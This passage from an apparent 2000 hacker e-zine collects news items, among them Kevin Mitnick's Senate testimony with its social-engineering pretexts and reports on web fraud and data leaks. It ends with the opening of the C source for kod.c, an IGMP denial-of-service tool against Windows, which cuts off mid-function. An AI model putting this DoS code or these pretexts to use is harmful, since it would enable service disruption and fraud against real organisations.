      years. In fact, it is incredible that many large-scale
      corporations have experienced significant security
      violations and have managed to keep these violations
      from reaching the front page of the Wall Street Journal. 
   
      Some hosting providers knowingly expose customers on
      insecure backend networks simply because internally
      security is not given a high-enough priority. Typically,
      getting new customers up and running has a lot higher
      priority than securing old customers. When it comes to
      provisioning new customers, hosting providers often
      become neglectful after the honeymoon period is over. 
   
      If an Internet company is outsourcing its web hosting to
      a service provider, a member of the executive
      management team needs to be held responsible for
      making sure its service provider has taken due security
      precautions. If your service provider claims your site is
      secure, they should not have any qualms about their
      customers performing audits on them.
      
      <SNIP>
      
      <Follow link for continuation (graphs etc) -Ed >
                       

      
      @HWA
      
107.0 HNN:Mar 2nd:Mitnick to Testify at Senate Today
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by macki 
      
      Kevin Mitnick will be in Washington DC today to testify before
      the Senate Governmental Affairs Committee as they ponder the security
      of the federal government's information systems. It's ironic that the
      same government that kept him locked for so long is now interested
      in hearing his opinions. The hearing is scheduled for Thursday at 10 am,
      Room D-342 in the Dirksen Senate Office building. (It will be
      interesting to see what Kevin has to say after four years in jail.)
      
      2600 - Written Testimony           
      http://www.2600.com/news/2000/0302-test.html
      
      Senate Press Release
      http://www.senate.gov/~gov_affairs/023200_press.htm      
      
      Security Focus
      http://www.securityfocus.com/data/news/klp022900.html
      
      
      2600 - Testimony
      
      KEVIN MITNICK'S WRITTEN SENATE TESTIMONY 

     03/02/00 

     Honorable Chairperson Thompson, Distinguished Senators, and Members of the 
     Committee: 

     My name is Kevin Mitnick. I appear before you today to discuss your efforts 
     to create legislation that will ensure the future security and reliability 
     of information systems owned and operated by, or on behalf of, the federal 
     government. 

     I am primarily self-taught. My hobby as an adolescent consisted of studying 
     methods, tactics, and strategies used to circumvent computer security, and 
     to learn more about how computer systems and telecommunication systems work. 

     In 1985 I graduated cum laude in Computer Systems and Programming from a 
     technical college in Los Angeles, California, and went on to successfully 
     complete a post-graduate project in designing enhanced security 
     applications that ran on top of a computer's operating system. That 
     post-graduate project may have been one of the earliest examples of "hire 
     the hacker:" the school's administrators realized I was hacking into their 
     computers in ways that they couldn't prevent, and so they asked me to 
     design security enhancements that would stop others' unauthorized access. 

     I have 20 years experience circumventing information security measures, and 
     can report that I have successfully compromised all systems that I targeted 
     for unauthorized access save one. I have two years experience as a private 
     investigator, and my responsibilities included locating people and their 
     assets using social engineering techniques. 

     My experience and success at accessing and obtaining information from 
     computer systems first drew national attention when I obtained user manuals 
     for the COSMOS computer systems (Computer Systems for Mainframe Operations) 
     used by Pacific Bell. 

     Ten years later the novel "Cyberpunk" was published in 1991, which 
     purported to be a "true" accounting of my actions that resulted in my arrest 
     on federal charges in 1988. One of the authors of that novel went on to 
     write similarly fictionalized "reports" about me for the New York Times, 
     including a cover story that appeared July 4, 1994. That largely fictitious 
     story labeled me, without reason, justification, or proof, as the "world's 
     most wanted cybercriminal." Subsequent media reports distorted that claim 
     into the false claim that I was the first hacker on the FBI's "Ten Most 
     Wanted" list. That false exaggeration was most recently repeated during my 
     appearance on CNN's Burden of Proof program on February 10, 2000. Michael 
     White of the Associated Press researched this issue with the FBI, and FBI 
     representatives denied ever including me on their "Ten Most Wanted" list. 

      I have gained unauthorized access to computer systems at some of the 
      largest corporations on the planet, and have successfully penetrated some 
      of the most resilient computer systems ever developed. I have used both 
      technical and non-technical means to obtain the source code to various 
      operating systems and telecommunications devices to study their 
      vulnerabilities and their inner workings. 

      After my arrest in 1995, I spent years as a pretrial detainee without 
      benefit of       bail, a bail hearing, and without the ability to see the 
      evidence against me, combined circumstances which are unprecedented in 
      U.S. history according to the research of my defense team. In March of 
      1999 I pled guilty to wire fraud and computer fraud. I was sentenced to 68 
      months in federal prison with 3 years supervised release. 

      The supervised release restrictions imposed on me are the most restrictive       
      conditions ever imposed on an individual in U.S. federal court, again 
      according to the research of my defense team. The conditions of supervised 
      release include, but are not limited to, a complete prohibition on the 
      possession or use, for any purpose, of the following: cell phones, 
      computers, any computer software programs, computer peripherals or support 
      equipment, personal information assistants, modems, anything capable of 
      accessing computer networks, and any other electronic equipment presently 
      available or new technology that becomes available that can be converted 
      to, or has as its function, the ability to act as a computer system or to 
      access a computer system, computer network, or telecommunications network. 

      In addition to these extraordinary conditions, I am prohibited from acting 
      as a       consultant or advisor to individuals or groups engaged in any 
      computer-related activity. I am also prohibited from accessing computers, 
      computer networks, or other forms of wireless communications myself or 
      through third parties. 

      I was released from federal prison on January 21, 2000, just 6 weeks ago. 
      I       served 59 months and 7 days, after earning 180 days of time off 
      for good behavior. I am permitted to own a land line telephone. 

      Computer Systems and Their Vulnerabilities 

      
      The goal of information security is to protect the integrity, 
      confidentiality, availability and access control to the information. 
      Secure information is protected against tampering, disclosure, and 
      sabotage. The practice of information security reduces the risk associated 
      with loss of trust in the integrity of the information. 

      Information security is comprised of four primary topics: physical 
      security,       network security, computer systems security, and personnel 
      security. Each of these four topics deserves a complete book, if not 
      several books, to fully document them. My presentation today is intended 
      to provide a brief overview of these topics, and to present my 
      recommendations for the manner in which the Committee may create effective 
      legislation. 

      1. Physical Security 

      1.1 Uncontrolled physical access to computer systems and computer networks       
      dramatically increases the likelihood that the system can and will suffer 
      unauthorized access. 

      1.1.1 Hardware Security Computers may be locked in rooms or buildings, 
      with       guards, security cameras, and cypher-controlled doors. The 
      greatest risk to information security in apparently secure hardware 
      environments is represented by employees, or impostors, who appear to 
      possess authorization to the secured space. 

      1.1.2 Data Security Many government agencies require formal backup 
      procedures to       ensure against data loss. Equally stringent 
      requirements must be in place to ensure the integrity and security of 
      those backup files. Intruders who cannot gain access to secure data but 
      who obtain unauthorized access to data backups successfully compromise any 
      security measures that may be in place, and with much less risk of 
      detection. 

      2. Network Security 

      2.1 Stand-alone computers are less vulnerable than computers that are 
      connected       to any network of any kind. Computers connected to 
      networks typically offer a higher incidence of misconfiguration, or 
      inappropriately enabled services, than computers that are not connected to 
      any network. The hierarchy of network "insecurity" is as follows: -- 
      Stand-alone computer - least vulnerable -- Computer connected to a LAN, or 
      local area network - more vulnerable -- Computer and a LAN accessible via 
      dial-up - even more vulnerable -- Computer and LAN connected to internet 
      -- most vulnerable of all 

     2.1.1 Unencrypted Network Communications Unencrypted network communications 
     permit anyone with physical access to the network to use software to monitor 
     all information traveling over the network, even though it?s intended for 
     someone else. Once a network tap is installed, intruders can monitor all 
     network traffic, and install software that enables them to capture, or 
     "sniff," passwords from network transmissions. 

     2.1.2 Dial-in Access Dial-in access increases vulnerabilities by opening up 
     an access point to anyone who can access ordinary telephone lines. Off site 
     access increases the risk of intruders gaining access to the network by 
     increasing the accessibility of the network and the remote computer. 

     3. Computer Systems Security 

     3.1 Computer systems that are not connected to any network present the most 
     secure computing environment possible. However, even a brief review of 
     standalone computer systems reveals many ways they may be compromised. 

     3.1.1 Operating Systems The operating systems control the functions of the 
     computer: how information is stored, how memory is managed, and how 
     information is displayed -- it?s the master program of the machine. At its 
     core, the operating system is a group of discrete software programs that 
     have been assembled into a larger program containing millions of lines of 
     code. Large modern day operating systems cannot be thoroughly tested for 
     security anomalies, or "holes," which represent opportunities for 
     unauthorized access. 

     3.1.2 Rogue Software Programs ?Rogue? software applications can be 
     installed surreptitiously, or with the unwitting help of another. These 
     programs can install a ?back door?, which usually consists of programming 
     instructions that disable obscure security settings in an operating system 
     and that enable future access without detection; some back door programs 
     even log the passwords used to gain access to the compromised system or 
     systems for future use by the intruder. 

      3.1.3 Ineffective Passwords Computer users often choose passwords that are 
      in the dictionary, or that have personal relevance, and are quite 
      predictable. Static, or unchanging, passwords represent another easy 
      method for breaching a computer system -- once a password is compromised, 
      the user and the system administrators have no way of knowing the password 
      is known to an intruder. Dynamic passwords, or non-dictionary passwords 
      are problematic for many users, who write them down and keep them near 
      their computers for easy access -- their own, or anyone who breaches 
      physical security of the computer installation. 

      3.1.4 Uninstalled Software Updates Out-of-date system software containing 
      known       security problems presents an easy target to an intruder. 
      Systems administrators cannot keep systems updated as a result of work 
      overload, competing priorities, or ignorance. The weaknesses of systems 
      are publicized, and out-of-date systems typically offer well-known 
      vulnerabilities for easy access. 

      3.1.5 Default Installations Default installations of some operating 
      systems       disable many of the built-in security features in a given 
      operating system. In addition, system administrators unintentionally 
      misconfigure systems, or include unnecessary services that may lead to 
      unauthorized access. Again, these weaknesses are widely publicized within 
      the computing community, and default or misconfigured installations 
      present an easy target. 

      4. Personnel Security 

      4.1 The most complex element in information security is the people who use 
      the       systems in which the information resides. Weaknesses in 
      personnel security negate the effort and cost of the other three types of 
      security: physical, network, and computer system security. 

      4.1.1 Social Engineering Social engineering, or "gagging," is defined as 
      gaining       intelligence through deception. Employees are trained to be 
      helpful, and to do what they are told in the workplace. The skilled social 
      engineer will use these traits to his or her advantage as they seek to 
      gain information that will enable them to achieve their objectives. 

      4.1.2 Email Attachments Email attachments may be sent with covert code 
      embedded       within. Upon receiving the email, most people will launch 
      the attachment, which can lower the security settings on the target 
      machine without the user's knowledge. The likelihood of a successful 
      installation using this method can be increased by following up the email 
      submittal with a telephone call to prompt the person to open the 
      attachment. 

      Information Security Exploits 

      
      Information security exploits are the methods, tactics, and strategies 
      used to breach the integrity, confidentiality, availability or access 
      control of information. Discovery of compromised information security has 
      several consequences, the most important of which is the decline in the 
      level of trust associated with the compromised information and systems 
      that contain that information. Examples of typical security exploits 
      follow. 

      5. Physical Security Exploits 

      5.1 Data Backup Exploit Using deception or sheer bravado, the intruder can 
      walk       into the off site backup storage facility, and ask for the 
      physical data backup by pretending to be from a certain agency. The 
      intruder can claim that particular backup is necessary to perform a data 
      restoration. Once an intruder has physical possession of the data, the 
      intruder can work with the data as though he possessed superuser, or 
      system administrator, privileges. 

      5.2 Physical Access Exploit If an intruder gains physical access to a 
      computer       and is able to reboot it, the intruder can gain complete 
      control of the system and bypass all security measures. An extremely 
      powerful exploit, but one that exposes the intruder to great personal risk 
      because they're physically present on the premises. 

      5.3 Network Physical Access Exploit Physical access to a network enables 
      an       intruder to install a tap on the network cable, which can be used 
      to eavesdrop on all network traffic. Eavesdropping enables the intruder to 
      capture passwords as they travel over the network, which will enable full 
      access to the machines whose passwords are compromised. 

      6. Network Security Exploits 

      6.1 Network software exists that probes computers for weaknesses. Once one       
      system weaknesses are revealed and the system is compromised, the intruder 
      can install software (called ?sniffer? software) that compromises all 
      systems on the network. Following that, an intruder can install software 
      that logs the passwords used to access that compromised machine. Users 
      routinely use the same or similar passwords across multiple machines; 
      thus, once one password for one machine is obtained, then multiple 
      machines can be compromised (see "Personnel Security Exploits"). 

      7. Computer System Exploits 

      7.1 Vulnerabilities in programs (e.g., the UNIX program sendmail) can be       
      exploited to gain remote access to the target computer. Many system 
      programs contain bugs that enable the intruder to trick the software into 
      behaving in a way other than that which is intended in order to gain 
      unauthorized access rights, even though the application is a part of the 
      operating system of the computer. 

      7.2 A misconfigured installation on a computer in operation at the Raleigh 
      News       and Observer, a paper in Raleigh, North Carolina, demonstrates 
      the problematic aspect of system misconfiguration. Using the UNIX program 
      ?Finger,? which enables one to identify the users that are currently 
      logged into a computer system, I created a user name on the computer 
      system I controlled. The user name I assigned myself matched exactly the 
      user name that existed on the target host. The misconfigured system was 
      set to ?trust? any computer on the network, which left the entire network 
      open for unauthorized access. 

      8. Personnel Security Exploits 

      8.1 Social Engineering -- involves tricking or persuading people to reveal       
      information or to take certain actions at the behest of the intruder. My 
      work as a private investigator relied heavily on my skills in social 
      engineering. 

      In my successful efforts to social engineer my way into Motorola, I used a       
      three-level social engineering attack to bypass the information security 
      measures then in use. First I was able to convince Motorola Operations 
      employees to provide me, on repeated occasions, the pass code on their 
      security access device, as well as the static PIN. The reason this was so 
      extraordinary is that the pass code on their access device changed every 
      60 seconds: every time I wanted to gain unauthorized access, I had to call 
      the Operations Center and ask for the password in effect for that minute. 

      The second level involved convincing the employees to enable an account 
      for my       use on one of their machines, and the third level involved 
      convincing one of the engineers who was already entitled to access one of 
      the computers to give me his password. I overcame that engineer's vigorous 
      reluctance to provide the password by convincing him that I was a Motorola 
      employee, and that I was looking at a form that documented the password 
      that he used to access his personal workstation on Motorola's network -- 
      despite the fact that he never filled out any such form! Once I gained 
      access to that machine, I obtained Telnet access to the target machine, 
      access which I had sought all along. 

      8.2 Voice Mail and Fax Exploit This exploit relies on convincing an 
      employee at       a large company to enable a voice mailbox: the intruder 
      would call the people who administer the voice mailboxes for the target 
      company and request a mailbox. The pretext would be that the intruder 
      works for a different division, and would like to retrieve messages 
      without making a toll call.

      Once the intruder has access to the voice mail system, the intruder would 
      call       the receptionist, represent himself as an employee of the 
      company, and ask that they take messages for him; last but not least, the 
      intruder would request the fax number and ask that incoming faxes be held 
      for pickup. This sets the stage for the call to the target division of the 
      company. 

      At this point, the intruder would call the target division to initiate the 
      fax       exploit with the goal of obtaining the targeted confidential 
      company information. During that call the intruder would identify himself 
      as an employee of the division whose voice mail and fax systems have just 
      been compromised, he would cite the voice mail box in support of his 
      identity, and would social engineer the target employee into faxing the 
      target information to the compromised fax number located at one of their 
      other offices. 

      Now the intruder would call the receptionist, tell the receptionist that 
      he's in       a business meeting, and ask that the receptionist fax the 
      confidential material "to the hotel." The intruder picks up the fax 
      containing confidential information at the secondary fax, which cannot be 
      traced back to either the intruder or the targeted company. 

      I used this exploit to successfully compromise ATT's protected network 
      access       points routinely. ATT had learned that a system had been 
      compromised by unauthorized entry at a central network access point called 
      "DataKit." They imposed network access passwords on all DataKits to 
      inhibit unauthorized access. I contacted one of the manager's secretaries 
      and used the Fax Exploit to convince the secretary to fax me the password 
      that enabled access to a DataKit that controlled dial-up access to ATT's 
      worldwide computer network. 

      9. Recommendations The Voice Mail and Fax Exploit demonstrates the most       
      important element in my testimony today: that verification mechanisms are 
      the weak link in information security, and voice mail and fax are the 
      tools used to verify the authenticity of the credentials presented by 
      someone seeking physical, network, or computer systems access. 

      The methods that will most effectively minimize the ability of intruders 
      to       compromise information security are comprehensive user training 
      and education. Enacting policies and procedures simply won't suffice. Even 
      with oversight the policies and procedures may not be effective: my access 
      to Motorola, Nokia, ATT, Sun depended upon the willingness of people to 
      bypass policies and procedures that were in place for years before I 
      compromised them successfully. The corporate security measures that I 
      breached were created by some of the best and brightest in the business, 
      some of whom may even have been consulted by the committee as you drafted 
      your legislation, Senate Bill S1993. 

      S1993 is represents a good first step toward the goal of increasing 
      information       security on government computer systems. I have several 
      recommendations that I hope will increase the effectiveness of your bill. 

      1. Each agency perform a thorough risk assessment of the assets they want 
      to       protect. 

      2. Perform a cost-benefit analysis to determine whether the price to 
      protect       those systems represents real value. 

     3. Implement policies, procedures, standards and guidelines consistent with 
     the risk assessment and cost benefit analyses. Employee training to 
     recognize sophisticated social engineering attacks is of paramount 
     importance. 

     4. After implementing the policies, procedures, standards and guidelines, 
     create an audit and oversight program that measures compliance throughout 
     the affected government agencies. The frequency of those audits ought to be 
     determined consistent with the mission of a particular agency: the more 
     valuable the data, the more frequent the audit process. 

     5. Create a numeric "trust ranking" that quantifies and summarizes the 
     results of the audit and oversight programs described above. The numeric 
     "trust ranking" would provide at-a-glance ranking -- a report card, if you 
     will -- of the characteristics that comprise the four major categories 
     defined above: physical, network, computer systems, and personnel. 

     6. Effective audit procedures -- implemented from the top down -- must be 
     part of an appropriate system of rewards and consequences in order to 
     motivate system administrators, personnel managers, and government 
     employees to maintain effective information security consistent with the 
     goals of this committee. 

     Conclusion 

     Obviously a brief presentation such as the one I've made today cannot 
     convey adequately the measures needed to implement effective information 
     security measures. I'm happy to answer any questions that may have been left
     unanswered for any members of the Committee.
     
     -=-
     
     Senate Press Release:
     
     
     
      FEBRUARY 23, 2000 
      THOMPSON/LIEBERMAN ANNOUNCE HEARING TO BETTER PROTECT GOVERNMENT COMPUTERS 
      FROM CYBERATTACK

      Washington, DC -- Senate Governmental Affairs Chairman Fred Thompson 
      (R-TN) and Ranking Member Joseph I. Lieberman (D-CT) announced today that 
      the Committee will       hold a March 2 hearing to discuss the security of 
      the federal governments information systems.

      "We know that federal agencies continue to use a band-aid approach to 
      computer security rather than addressing the systemic problems which make 
      government systems       vulnerable to repeated computer attacks," said 
      Thompson. "Hopefully, the recent breaches of security at the various 
      dot.com companies is the wake-up call needed to focus attention on the 
      security of government computer systems. This Committee has been looking 
      at the federal government's use of computers since the passage of the 
      Brooks Act in 1965. Since I became chairman of the Committee in 1997, we 
      heave heard from security experts, senior government officials and the 
      General Accounting Office about the persistent security risks associated 
      with the governments information holdings."

      Senator Lieberman added, "The simple and frightening fact is, government 
      computer systems are vulnerable to the kinds of attacks e-businesses have 
      been suffering lately -       and worse. Lax government computer security 
      threatens our national security, our transportation and emergency 
      services, our banking and finance. And if this weren't cataclysmic enough, 
      it also leaves the most personal information of all our taxpayers - our 
      veterans, our elderly, our sick - vulnerable to exposure and exploitation. 
      Scores of government systems have already been hacked although 
      fortunately, none of the intrusions to date has been damaging. But let's 
      face it: it's only a matter of time."

      The March 2 hearing will explore the human side of computer security as it 
      relates to successfully implementing a sound government computer security 
      program.

      On November 19, 1999, Thompson and Lieberman introduced S. 1993, the 
      Government Information Security Act that provides a framework for how the 
      government could make       its systems more secure while simultaneously 
      providing continuous, uninterrupted services to the public. The 
      legislation is based on Governmental Affairs Committee hearings and a GAO 
      best practices study.
      
      -=-
      
      Security Focus:
      
      Mr. Mitnick Goes to Washington 

      February 29, 12:44 PM PST By Kevin Poulsen 

      WASHINGTON (SecurityFocus.com News) - A little over one month after his 
      release from prison, famed hacker Kevin Mitnick will testify before the 
      Senate Committee on Governmental Affairs on Thursday morning, in a hearing 
      planned to address the       security of the federal government's computer 
      networks. 

      Committee chairman Fred Thompson (R-TN) and ranking member Joseph 
      Lieberman (D-CT) announced the hearing last Wednesday - one of a flurry of 
      congressional hearings to follow this month's crippling denial of service 
      attacks on various       high-traffic Internet sites. The witness list was 
      made public this afternoon, and also includes James Adams from computer 
      security company iDefense, Cisco's Ken Watson, and two government experts. 

      Mitnick, arguably the world's most famous recreational computer intruder, 
      plead guilty in March of 1999 to seven felonies, and admitted to cracking 
      computers belonging to cell phone companies and computer makers, including 
      Motorola (NYSE:       MOT), Fujtsu and Sun Microsystems (Nasdaq: SUNW). He 
      was freed January 21st, after nearly five years behind bars. 

      In a public statement following his release, Mitnick sharply criticized 
      federal prosecutors and the media for their handling of his case. 
      According to Greg Vinson, one of Mitnick's attorneys, Thursday's testimony 
      will have a different focus. 

      "He's testifying about his experience with system vulnerabilities and ways 
      to make government's computer systems more secure," said Vinson. 


      
      @HWA
      
108.0 HNN:Mar 2nd:Utah Passes Net Filtering Law
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Odin
      
      Late last month voters in the general primary of Michigan defeated a
      ballot initiative to prevent Internet filtering in libraries. Now in
      Utah, the State Senate has voted 28-0 to withhold funding from state
      libraries that do not implement internet filters. So, despite numerous
      others states voting against this measure, it is still being imposed on
      the citizens of Utah. (Are the State Senators of Utah accurately
      representing their constituents?)
      
      USAToday
      http://www.usatoday.com/life/cyber/tech/cth467.htm
      
      02/29/00- Updated 02:05 PM ET

                  

      Utah eyes Net filters for libraries

      SALT LAKE CITY (AP) - The Utah Senate gave final legislative approval
      Monday to a bill that would withhold state funding from libraries that fail to
      shield Web sites featuring obscene material from children younger than 18. 

      The Senate vote was 28-0. 

      A number of Utah libraries already
      use filtering programs to shield
      minors from pornography. 

      Also Monday, the Utah House
      voted to take Playboy out of
      prisons.

      The House gave final legislative approval to a measure banning from prisons,
      jails and juvenile detention centers any magazine, book, pamphlet,
      newsletter, stationery, greeting card or video that ''features nudity.'' 

      The bills now go to Gov. Mike Leavitt, who has not announced his position
      on either piece of legislation.     
      
      
      @HWA
      
109.0 HNN:Mar 2nd:Restaurants Gather Data on Customers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Odin
      
      Forget credit card companies, or web advertisers; the real privacy
      invaders may actually be restaurants. Restaurants that keep track of
      what you eat, how much of it, what you like, how much you tip, how much
      wine you drink, who you come in with, etc. With cameras mounted over
      your table gathering personal data has become extremely easy.(Seems
      like everyone wants a database these days, now who is going to be the
      first to put them all together?)
      
      NY Times
      http://www.nytimes.com/library/dining/030100video-privacy.html
      (Pay to play...)
      
      
      @HWA 
      
       
      
110.0 HNN:Mar 2nd:Expedia Takes Charge for Fraud
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Online_Temped 
      
      Expedia, the online travel affiliate of Microsoft, said on Wednesday
      that it will record a fiscal third quarter charge of $4 to $6 million.
      The charge is to cover the cost of fraudulent transactions on its Web
      site. (And who will pay for this fraud? The consumer of course in the
      form of higher prices.)
      
      ZD Net UK
      http://www.zdnet.co.uk/news/2000/8/ns-13772.html
      
      Expedia takes on fraudulent Web charges
      
       Wed, 01 Mar 2000 14:04:54 GMT
       Reuters
      
      
      Online transactions are dealt another blow with Expedia
      announcement 
      
      Expedia, the online travel affiliate of Microsoft, said on
      Wednesday that it will record a fiscal third quarter charge of $4 to
      $6m (2 to 3m) to cover the cost of fraudulent transactions on its
      Web site. 
      
      The company said stolen credit cards were used to book travel
      reservations through the site (www.expedia.com). However they
      said the cards weren't stolen from the site and its customers were
      not affected. 
      
      "The security of the Expedia.com site and its customer information
      has not been compromised," the company said in a statement. 
      
      The recent theft of credit card numbers from retail Web site CD
      Universe and RealNames, which sells simplified Internet address
      services, has exacerbated concerns about the safety of doing
      business over the Web. Concerns intensified after attacks by
      suspected computer hackers on a number of major Web sites,
      including Yahoo!, Amazon.com and eBay. 
      
      The Expedia reserve represents the company's estimate of
      unreserved fraudulent activity to date, and is less than one half of
      one percent of travel tickets sold, the company said. Gross
      bookings to date on the Expedia.com Web site total more than
      $1bn (62m). 
      
      Expedia shares closed at 20 on Tuesday on the Nasdaq stock
      market. 
      
      
       
      @HWA
       
      
111.0 HNN:Mar 2nd:CD Universe Attempts to Recover From Database Theft
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      Almost two months after having most of its customers credit card
      information posted to the internet and with the perpetrator Maxim still
      at large CD Universe is attempting to rebuild its business. Now
      claiming one of the most secure sites on the net CD Universe is hoping
      that their customers and investors return.
      
      Nando Times
      http://www.nandotimes.com/technology/story/body/0,1634,500175233-500227783-501098807-0,00.html
      (404)
      
       
      @HWA
      
112.0 HNN:Mar 2nd:Sony Bungles Personal Info On Web
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by ikegami 
      
      According to Japan's Asahi News, PlayStation Dot Com Japan (owned by
      Sony Computer Entertainment) mishandled their customer database.
      PlayStation Dot Com Japan took online orders for the new PlayStation2.
      According to the report, users only needed to enter a customer number in
      the tracking system home page in order to review or change their order.
      By entering a different number, anyone could browse other's personal
      information. PlayStation Dot Com Japan is currently checking to see if
      any information was actually compromised. The system was designed by IBM
      Japan.
      
      Asahi News - Japanese
      http://www.asahi.com/0302/news/national02032.html
      
      @HWA 
      
       
      
113.0 HNN:Mar 2nd:CIA Report on Deutch Posted to Net
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by marka 
      
      The Federation of American Scientists has released a copy of the CIA's
      report "Central Intelligence Agency Inspector General, Report of
      Investigation - Improper Handling of Classified Information By John M.
      Deutch". The report has a "For Official Use Only" handling caveat on it,
      but the great folks at FAS (who know the Freedom of Information Act way
      better than a lot of organizations) was able to score a copy and is
      graciously posting it for all the world to see.
      
      Federation of American Scientists
       Report of
      Investigation
      http://www.fas.org
      
      @HWA
      
114.0 HNN:Mar 2nd:Brazil Authorities Try to Combat Online Criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Apocalyse Dow 
      
      With limited resources and weak laws Brazilian authorities have had a
      hard time tracking down and arresting cyber criminals. With intrusions
      into Brazilian Government web sites almost routine lawmakers are looking
      to pass stricter laws. (Hmmm, same song, different country.)
      
      CNN
      http://www.cnn.com/2000/TECH/computing/03/01/brazil.hackers.reut/index.html
      
      Brazil's Net spawns pirates
      and prodigies
      
      March 1, 2000 
      Web posted at: 3:35 PM EST (2035 GMT) 
      
      
      In this story: 
      
      Dr. Delete and Inferno
      
      The second round
      
      From the garage to the stock market 
      
      
      By Shasta Darlington 
      
      SAO PAULO (Reuters) -- While Edgar Nogueira's schoolmates in Brazil
      launch attacks on NASA's and top model Claudia Schiffer's sites, the
      17-year-old Internet entrepreneur plots his company's debut on stock
      exchanges. 
      
      The Rio de Janeiro high school student designed his own search engine
      Aonde at the tender age of 14 and has since signed up big-name advertisers
      and lured potential investors to the company now valued at $5.6 million. 
      
      "There are some who want to build and some who want to destroy,"
      Nogueira said from his parents' home -- which doubles as an Internet office
      -- on Brazil's famous Copacabana beach. 
      
      And Brazil is an ideal place to try both. 
      
      The country's nascent Internet market is one of
      the fastest growing in the world, fuelling hundreds
      of start-ups and attracting as many investors on
      the lookout for the next Yahoo! or Amazon.com.
      
      But the complete lack of laws regulating the
      still-green industry has also made it a hacker
      haven. 
      
      In the first half of February, Brazilian cyber pirates attacked at least 17
      international sites including government Web pages from the United States to
      Peru, the Federal Police said. 
      
      Dr. Delete and Inferno
      
      The group Inferno.com.br scrawled this graffiti message on U.S. space
      agency NASA's home page: "We don't see much difference between your
      security system and that of the Brazilian government. You get the picture?" 
      
      And while Brazil's Dr. Delete invaded Claudia Schiffer's virtual address,
      dozens of other Brazilian vandals left scathing comments about President
      Fernando Henrique Cardoso throughout the Web. 
      
      In Peru, Brazilian hackers defaced with offensive messages a site where
      April's presidential vote is going to be posted, forcing the government to
      temporarily shut the page down. 
      
      Under Brazilian law, hackers can only be punished if they also happen to
      steal, damage property or violate privacy, and limited resources have been
      set aside to investigate computer crimes. 
      
      Ironically, the only government agency prepared to process Internet outlaws,
      the Federal Police's Department of Computer Crimes, has itself had its Web
      site defaced, according to local press. 
      
      "The party is just starting," invaders wrote on the department's Web site at
      the end of last year. 
      
      The government is scrambling to create anti-hacker legislation to control the
      cyber raids but some investors are hoping the Internet itself will convert
      some outlaws with its promise of big profits. 
      
      "If they were to put all that vice used to overcome systems into producing
      things you could have a huge intelligence bank," said Alexandre Marcel, an
      investor at Estrategia brokerage and adviser for Nogueira's Aonde site. 
      
      The second round
      
      The opportunity for growth and innovation in Brazil is big, investors say.
      Internet use is growing at over 50 percent a year, but it has still only reached
      a fraction of the country's 165 million people. 
      
      International heavyweights like Spain's Terra Networks and New
      York-based Starmedia gobbled up local Internet upstarts last year, creating
      Brazil's first generation of cyber millionaires. 
      
      The second round of buying has already started in 2000. A subsidiary of
      Portugal Telecom bought major Brazilian Internet provider Zip.net for $415
      million earlier this month and other companies and specialized funds are on
      the prowl for fledgling firms with fresh ideas. 
      
      Brazil's GP Investimentos fund, owned by renowned investment banking
      aces, has been one of the biggest spenders on Internet innovation, snapping
      up upstarts like WebMotors online car seller, created by a twenty-something
      car specialist who decided to experiment on the Web. 
      
      In Brazil's northeast, a handful of computer students are leaping from the
      classroom to the boardroom as graduate theses like Brazilian search engine
      and media network Radix turn into Internet success stories with the help of a
      little financing. 
      
      At the same time, hundreds of young wanna-be-entrepreneurs like Nogueira
      are building sites at break-neck speed in hopes of catching the Latin Internet
      wave. 
      
      "I've had to turn down at least 20 projects so I can focus on making Aonde
      grow," Estrategia's Marcel said. 
      
      From the garage to the stock market
      
      Aonde started out as more of a hobby than a business but Brazilians flocked
      to the site in search of country-specific Portuguese language information. The
      company, which means "Where to" in Portuguese, is now one of the four
      biggest Brazilian search engines. 
      
      Nogueira's lunch money has skyrocketed as a result. But the baseball-cap
      wearing whiz kid says he spends only a few dollars a month on movies and
      outings with friends. 
      
      Most of the $8,000 a month in income he has been reinvesting in Aonde to
      beef up its data base and lure potential investors. Nogueira is now in talks
      with at least five interested partners and lenders and is eyeing an Initial Public
      Offering toward the end of the year or in 2001 in New York and Rio de
      Janeiro. 
      
      "I want to get a bigger office and hire more people," Nogueira said. His
      father, a doctor, currently advises him on business deals and his mother
      helps him answer e-mails and arrange press meetings. 
      
      "But I guess I have dreams like everybody else. I want to buy a car," he
      admits. "I wouldn't mind a BMW." 
       
      @HWA
      
      
115.0 HWA:IGMP (kod.c kox.c trash2.c) Windows DoS (Old/but still effective)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Important info regarding the IGMP DoS against Windows machines missing      
      from past issues.
      
      kod.c - culprit#1
      
      #include <stdio.h>
      #include <netdb.h>
      #include <string.h>
      #include <unistd.h>
      #include <errno.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      size_t hits = 5;
      unsigned short port = 100;
      void usage (char *progname)
      {
        printf("Usage: %s <host> -p port -t hits\n", progname);
        exit(1);
      }
      void parse_args (int argc, char *argv[], char **target)
      {
       int y;
       *target = argv[1];
      
       if (argv[1][0] == '-') {
        printf ("Must specify a target.\n");
        exit (1);
       }
       for (y=2; y < argc; y++) {
        if (!strcmp(argv[y], "-p")) {
         y++;
         port = atoi (argv[y]);
